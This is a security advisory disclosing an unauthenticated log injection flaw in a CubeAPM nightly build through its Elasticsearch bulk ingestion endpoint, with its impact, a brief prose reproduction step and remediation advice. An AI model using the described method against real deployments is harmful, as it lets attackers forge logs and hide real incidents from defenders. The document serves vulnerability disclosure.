CubeAPM Unauthenticated Log Injection Vulnerability

A log injection vulnerability has been identified in CubeAPM version nightly-2025-08-01-1. This issue allows unauthenticated attackers to inject arbitrary log entries into production systems via the /api/logs/insert/elasticsearch/_bulk endpoint. The endpoint accepts bulk log data without authentication or input validation, enabling remote attackers to perform unauthorized log injections. Exploitation of this vulnerability could result in false log entries, log poisoning, obfuscation of alerts, and potential performance degradation of the observability pipeline.

Impact

Exploitation of this vulnerability can lead to false log injections, misleading monitoring systems and analysts. The injected log data may corrupt dashboards and metrics, affecting detection and response to real incidents. Additionally, the log injection can conceal genuine indicators of compromise, while excessive unauthenticated injections may overload the logging pipeline, causing a denial-of-service condition.

Reproduction

To reproduce this vulnerability, send a POST request to the /api/logs/insert/elasticsearch/_bulk endpoint without authentication. Include bulk log data in the request body, formatted as ndjson. The injected log entries will be accepted and processed by the CubeAPM observability pipeline.

Remediation

Update to CubeAPM version nightly-2025-09-19-1 or later. It is also recommended to require authentication and authorization for all log ingestion endpoints, validate input structures, sanitize fields, and restrict access to trusted services only.